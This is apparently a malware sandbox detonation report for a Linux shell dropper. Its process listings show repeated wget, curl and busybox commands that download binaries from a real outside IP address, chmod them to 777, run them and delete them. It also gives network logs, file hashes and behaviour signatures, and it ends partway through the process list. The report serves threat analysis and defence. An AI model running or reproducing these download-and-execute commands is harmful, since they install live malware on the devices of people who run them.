[wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/bin/chmod

[chmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z

[./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/bin/rm

[rm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/usr/bin/wget

[wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/bin/chmod

[chmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db

[./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/bin/rm

[rm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/usr/bin/wget

[wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/bin/chmod

[chmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq

[./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/bin/rm

[rm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/usr/bin/wget

[wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/bin/chmod

[chmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ

[./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/bin/rm

[rm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/bin/chmod

[chmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt

[./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/bin/rm

[rm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/usr/bin/wget

[wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/chmod

[chmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH

[./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/rm

[rm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/usr/bin/wget

[wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/chmod

[chmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD

[./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/rm

[rm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/usr/bin/wget

[wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/chmod

[chmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP

[./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/rm

[rm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/usr/bin/wget

[wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/bin/chmod

[chmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw

[./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/bin/rm

[rm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/usr/bin/wget

[wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/bin/chmod

[chmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy

[./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/bin/rm

[rm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/usr/bin/wget

[wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/bin/chmod

[chmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz

[./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/bin/rm

[rm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/usr/bin/wget

[wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/bin/chmod

[chmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4

[./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/bin/rm

[rm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/usr/bin/wget

[wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/bin/chmod

[chmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932

[./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/bin/rm

[rm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/usr/bin/wget

[wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/bin/chmod

[chmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs

[./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/bin/rm

[rm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/usr/bin/wget

[wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/bin/chmod

[chmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z

[./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/bin/rm

[rm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/usr/bin/wget

[wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/bin/chmod

[chmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt

[./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/bin/rm

[rm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/usr/bin/wget

[wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/bin/chmod

[chmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db

[./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/bin/rm

[rm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/usr/bin/wget

[wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/bin/chmod

[chmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq

[./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/bin/rm

[rm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/usr/bin/wget

[wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/bin/chmod

[chmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ

[./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/bin/rm

[rm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.129.91:443 tcp
US 1.1.1.1:53 ocp-ingress.fastly.gnome.org udp
US 151.101.1.91:443 ocp-ingress.fastly.gnome.org tcp
US 216.126.231.240:80 216.126.231.240 tcp
GB 89.187.167.8:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-14 02:53

Reported

2024-11-14 02:56

Platform

debian9-armhf-20240611-en

Max time kernel

65s

Max time network

69s

Command Line

[/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH N/A
N/A /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy N/A
N/A /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz N/A
N/A /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 N/A
N/A /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 N/A
N/A /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD N/A
N/A /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP N/A
N/A /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw N/A
N/A /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs N/A
N/A /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z N/A
N/A /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db N/A
N/A /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq N/A
N/A /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ N/A
N/A /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt N/A
N/A /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH N/A
N/A /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD N/A
N/A /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz /usr/bin/curl N/A
File opened for modification /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw /usr/bin/curl N/A
File opened for modification /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs /usr/bin/curl N/A
File opened for modification /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z /usr/bin/curl N/A
File opened for modification /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ /usr/bin/curl N/A
File opened for modification /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /usr/bin/curl N/A
File opened for modification /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy /usr/bin/curl N/A
File opened for modification /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 /usr/bin/curl N/A
File opened for modification /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 /usr/bin/curl N/A
File opened for modification /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP /usr/bin/curl N/A
File opened for modification /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP /usr/bin/curl N/A
File opened for modification /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /usr/bin/curl N/A
File opened for modification /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db /usr/bin/curl N/A
File opened for modification /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /usr/bin/curl N/A
File opened for modification /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt /usr/bin/curl N/A
File opened for modification /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /usr/bin/curl N/A
File opened for modification /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq /usr/bin/curl N/A

Processes

/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh

[/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/chmod

[chmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH

[./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/rm

[rm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/usr/bin/wget

[wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/bin/chmod

[chmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy

[./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/bin/rm

[rm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/usr/bin/wget

[wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/bin/chmod

[chmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz

[./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/bin/rm

[rm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/usr/bin/wget

[wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/bin/busybox

